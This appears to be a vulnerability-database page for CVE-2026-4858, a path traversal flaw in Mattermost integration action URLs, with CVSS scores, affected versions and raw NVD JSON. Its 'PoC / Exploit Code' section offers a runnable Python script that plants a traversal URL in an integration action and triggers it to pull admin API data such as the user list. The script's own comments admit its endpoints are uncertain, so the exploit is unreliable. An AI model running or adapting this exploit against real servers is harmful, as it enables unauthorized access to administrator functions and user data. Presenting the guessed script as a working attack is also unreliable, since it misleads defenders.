Security Vulnerability Report
中文
CVE-2026-4858 CVSS 8.0 HIGH

CVE-2026-4858

Published: 2026-05-21 09:16:30
Last Modified: 2026-05-21 19:43:31
Source: [email protected]

Description

Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check integration URL for path traversal which allows an malicious authenticated user to call an arbitrary API via system admin Mattermost auth token using via path traversal in integration action URL.. Mattermost Advisory ID: MMSA-2026-00640

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:11.6.0:*:*:*:*:*:*:* - VULNERABLE
Mattermost 11.6.x <= 11.6.0
Mattermost 11.5.x <= 11.5.3
Mattermost 11.4.x <= 11.4.4
Mattermost 10.11.x <= 10.11.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-4858: Mattermost Path Traversal in Integration URL import requests import sys def exploit(target, user_token): """ Exploit the path traversal vulnerability in Mattermost integration URL. This allows calling arbitrary APIs with system admin privileges. """ headers = { "Authorization": f"Bearer {user_token}", "Content-Type": "application/json" } # Step 1: Create a malicious integration/action with path traversal # Note: The actual endpoint depends on Mattermost API version create_action_url = f"{target}/api/v4/actions" # Payload using path traversal to access admin API (e.g., getting all users) # The server resolves this relative to an internal base, escaping the sandbox malicious_url = "api/v4/../../../../api/v4/users" payload = { "name": "ExploitAction", "integration": {"url": malicious_url} } try: print(f"[*] Creating malicious integration at {target}...") # In a real scenario, this creates the action that triggers the vulnerable code path r = requests.post(create_action_url, json=payload, headers=headers) if r.status_code == 201: action_id = r.json().get('id') print(f"[+] Action created with ID: {action_id}") # Step 2: Trigger the action to execute the path traversal trigger_url = f"{target}/api/v4/actions/{action_id}/trigger" print(f"[*] Triggering action to exploit path traversal...") # The response should contain data from the arbitrary API call trigger_r = requests.post(trigger_url, headers=headers) if trigger_r.status_code == 200: print("[+] Exploit successful! Arbitrary API data retrieved:") print(trigger_r.text) else: print(f"[-] Trigger failed. Status: {trigger_r.status_code}") else: print(f"[-] Failed to create action. Status: {r.status_code}") print(r.text) except Exception as e: print(f"Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: python {sys.argv[0]} <target_url> <user_token>") sys.exit(1) exploit(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4858", "sourceIdentifier": "[email protected]", "published": "2026-05-21T09:16:30.143", "lastModified": "2026-05-21T19:43:31.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to check integration URL for path traversal which allows an malicious authenticated user to call an arbitrary API via system admin Mattermost auth token using via path traversal in integration action URL.. Mattermost Advisory ID: MMSA-2026-00640"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.15", "matchCriteriaId": "6696A83A-CD06-45BD-A4C1-16A09C4CA15B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.5", "matchCriteriaId": "AB489375-1F54-4A24-AE2C-37D92B27FF4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.5.0", "versionEndExcluding": "11.5.4", "matchCriteriaId": "617D4791-A087-42E8-BF73-B39B30CB29C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "6287452E-C8F4-4266-BBF9-0F839115215A"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.